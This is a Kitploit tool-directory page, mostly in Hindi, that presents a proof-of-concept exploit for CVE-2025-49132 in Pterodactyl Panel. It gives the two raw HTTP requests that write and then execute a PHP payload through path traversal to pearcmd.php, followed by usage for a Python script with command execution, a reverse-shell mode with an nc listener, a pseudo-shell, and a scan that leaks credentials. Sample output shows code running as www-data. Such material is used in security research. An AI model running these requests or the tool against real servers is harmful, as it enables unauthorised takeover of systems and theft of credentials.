Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132-PHP-PEAR — CVE-2025-49132_PHP_PEAR_METHOD | Kitploit
उपकरण/GitHubGitHub/rippsec/cve-2025-49132-php-pear
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubrippsec/cve-2025-49132-php-pear

CVE-2025-49132-PHP-PEAR

CVE-2025-49132_PHP_PEAR_METHOD

रिपॉजिटरी देखें
31107 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49132: PHP PEAR विधि के माध्यम से Pterodactyl पैनल अनधिकृत RCE

CVSSv3 License Python

विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • तकनीकी विश्लेषण
  • एक्सप्लॉइट प्रवाह
  • स्थापना
  • उपयोग
  • उदाहरण
  • शमन
  • अस्वीकरण
  • संदर्भ
  • लेखक

अवलोकन

यह रिपॉजिटरी CVE-2025-49132 के लिए एक proof-of-concept (PoC) एक्सप्लॉइट है, जो 1.11.11 से पहले के Pterodactyl पैनल संस्करणों में एक गंभीर अनधिकृत रिमोट कोड निष्पादन भेद्यता है।

Pterodactyl पैनल PHP में निर्मित एक मुफ्त, ओपन-सोर्स गेम सर्वर प्रबंधन पैनल है। यह भेद्यता एक अनधिकृत हमलावर को PHP PEAR की pearcmd.php कार्यक्षमता के साथ संयुक्त /locales/locale.json एंडपॉइंट के अनुचित हैंडलिंग के माध्यम से लक्षित सर्वर पर मनमाना सिस्टम कमांड निष्पादित करने की अनुमति देती है।

भेद्यता सारांश

  • CVE ID: CVE-2025-49132
  • CVSS स्कोर: 10.0 (गंभीर)
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • CWE: CWE-94: कोड की पीढ़ी का अनुचित नियंत्रण ('कोड इंजेक्शन')
  • प्रभावित संस्करण: Pterodactyl पैनल < 1.11.11
  • हमले की जटिलता: कम
  • आवश्यक विशेषाधिकार: कोई नहीं (अनधिकृत)
  • उपयोगकर्ता सहभागिता: कोई नहीं

भेद्यता विवरण

PHP PEAR क्या है?

PHP PEAR (PHP एक्सटेंशन और एप्लिकेशन रिपॉजिटरी) पुन: प्रयोज्य PHP घटकों के लिए एक फ्रेमवर्क और वितरण प्रणाली है। यह एक कमांड-लाइन टूल (pearcmd.php) प्रदान करता है जिसका उपयोग PEAR पैकेज प्रबंधित करने के लिए किया जा सकता है।

pearcmd.php फ़ाइल URL पैरामीटर के माध्यम से कमांड संसाधित करती है, और जब पाथ ट्रैवर्सल के साथ संयुक्त किया जाता है, तो इसका उपयोग इसके लिए किया जा सकता है:

  1. सिस्टम पर मनमानी PHP फ़ाइलें बनाना
  2. उन फ़ाइलों को वेब सर्वर के माध्यम से निष्पादित करना

मूल कारण

यह भेद्यता निम्न कारणों से मौजूद है:

  1. अमान्य पाथ ट्रैवर्सल: /locales/locale.json में locale पैरामीटर उचित सत्यापन के बिना पाथ ट्रैवर्सल की अनुमति देता है
  2. प्रत्यक्ष फ़ाइल समावेशन: एप्लिकेशन उपयोगकर्ता-नियंत्रित इनपुट के आधार पर सीधे फ़ाइलें शामिल करता है
  3. PEAR कमांड इंजेक्शन: pearcmd.php स्क्रिप्ट +config-create कमांड स्वीकार करती है जो मनमानी PHP फ़ाइलें लिख सकती है
  4. अनधिकृत पहुंच: असुरक्षित एंडपॉइंट को प्रमाणीकरण की आवश्यकता नहीं होती है

हमला वेक्टर

एक हमलावर यह कर सकता है:

  1. PEAR स्थापना निर्देशिका तक पहुंचने के लिए पाथ ट्रैवर्सल का उपयोग करना
  2. /tmp में दुर्भावनापूर्ण PHP कोड लिखने के लिए config-create कमांड का दुरुपयोग करना
  3. उसी एंडपॉइंट के माध्यम से दुर्भावनापूर्ण PHP फ़ाइल को निष्पादित करना
  4. वेब सर्वर उपयोगकर्ता के रूप में पूर्ण रिमोट कोड निष्पादन प्राप्त करना

तकनीकी विश्लेषण

शोषण प्रक्रिया

यह एक्सप्लॉइट दो चरणों में काम करता है:

चरण 1: पेलोड निर्माण

GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.com

विवरण:

  • +config-create+/ - PEAR की कॉन्फ़िग निर्माण कार्यक्षमता को लागू करता है
  • locale=../../../../../../usr/share/php/PEAR - PEAR निर्देशिका के लिए पाथ ट्रैवर्सल
  • namespace=pearcmd - pearcmd.php फ़ाइल को लक्षित करता है
  • <?=system('id')?>+/tmp/payload.php - PHP पेलोड और गंतव्य फ़ाइल

चरण 2: पेलोड निष्पादन

GET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.com

विवरण:

  • locale=../../../../../../tmp - /tmp निर्देशिका के लिए पाथ ट्रैवर्सल
  • namespace=payload - payload.php को शामिल और निष्पादित करता है

URL एन्कोडिंग एक्सप्लॉइट को क्यों तोड़ती है

एक्सप्लॉइट को URL में विशेष वर्णों (<, >, ?, =) को बिना एन्कोड किए भेजने की आवश्यकता होती है। यदि ये वर्ण URL-एन्कोडेड हैं:

  • <?=system('id')?> %3C%3F%3Dsystem%28%27id%27%29%3F%3E बन जाता है
  • PEAR इसे PHP कोड के बजाय शाब्दिक पाठ के रूप में व्याख्या करता है
  • PHP टैग पहचाने नहीं जाते, जिससे कोड निष्पादन रुक जाता है

एक्सप्लॉइट प्रवाह

graph TD
    A[Attacker] -->|1. Path Traversal Request| B[locale.json]
    B -->|2. Traverse to PEAR| C[pearcmd.php]
    C -->|3. config-create Command| D[Write PHP Payload]
    D -->|4. Create File| E[payload.php]
    E -->|5. File Created| F[Server Filesystem]
    
    A -->|6. Execution Request| G[locale.json]
    G -->|7. Traverse to tmp| E
    E -->|8. Include and Execute| H[PHP Interpreter]
    H -->|9. System Command| I[Shell Command]
    I -->|10. Command Output| A
    
    style A fill:#ff6b6b
    style B fill:#4ecdc4
    style C fill:#ffe66d
    style E fill:#ff6b6b
    style H fill:#ff6b6b
    style I fill:#ff6b6b

हमला प्रवाह आरेख

sequenceDiagram
    participant Attacker
    participant Web Server
    participant PEAR
    participant Filesystem
    participant PHP Engine
    
    Attacker->>Web Server: GET locale.json with config-create
    Web Server->>PEAR: Path Traversal to pearcmd
    PEAR->>Filesystem: Create payload.php
    Filesystem-->>Attacker: 200 OK
    
    Attacker->>Web Server: GET locale.json with payload namespace
    Web Server->>Filesystem: Path Traversal to payload.php
    Filesystem->>PHP Engine: Include payload
    PHP Engine->>PHP Engine: Execute system command
    PHP Engine-->>Attacker: Command Output RCE

स्थापना

आवश्यक शर्तें

  • Python 3.6 या उच्चतर
  • requests लाइब्रेरी

रिपॉजिटरी क्लोन करें

git clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHOD

निर्भरताएं स्थापित करें

pip3 install -r requirements.txt

या मैन्युअल रूप से:

pip3 install requests

उपयोग

बेसिक कमांड निष्पादन

python3 poc.py -H <target_host> -c "<command>"

रिवर्स शेल

# On attacker machine, start listener
nc -lvnp 4444

# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444

इंटरैक्टिव स्यूडो-शेल

python3 poc.py -H <target_host> --shell

PEAR स्थापनाओं के लिए फ़ज़ करें

python3 poc.py -H <target_host> --fuzz

भेद्यता के लिए स्कैन करें

python3 poc.py -H <target_host> --scan

कॉन्फ़िग लीक (डेटाबेस क्रेडेंशियल, ऐप कुंजी) के माध्यम से CVE-2025-49132 की जांच करता है।

कस्टम PEAR पथ

python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"

वर्बोज़ आउटपुट

python3 poc.py -H <target_host> -c "id" -v

विस्तृत प्रगति दिखाता है (पेलोड निर्माण, PEAR पथ, निष्पादन स्थिति)।

पूर्ण विकल्प

usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
              [-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  Target host (e.g., 192.168.1.100 or example.com)
  -c COMMAND            Command to execute on target system
  -r REVERSE_SHELL      Reverse shell (format: LHOST:LPORT)
  --shell               Interactive pseudo-shell mode
  --fuzz                Fuzz for PEAR installation paths
  --scan                Scan target for vulnerability (config leaks)
  -p PEAR_PATH          Custom PEAR path (default: /usr/share/php/PEAR)
  -e ENDPOINT           Vulnerable endpoint (default: /locales/locale.json)
  --ssl                 Use HTTPS
  --timeout TIMEOUT     Request timeout in seconds (default: 10)
  -v, --verbose         Verbose progress output

उदाहरण

उदाहरण 1: बेसिक कमांड निष्पादन

$ python3 poc.py -H panel.pterodactyl.htb -c "id"

[CVE-2025-49132] Pterodactyl Panel RCE via PHP PEAR

[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

वर्बोज़ आउटपुट (पेलोड विवरण, PEAR पथ, आदि) के लिए -v का उपयोग करें।

उदाहरण 2: रिवर्स शेल

# Terminal 1: Start listener
$ nc -lvnp 4444
listening on [any] 4444 ...
टूल डाउनलोड करें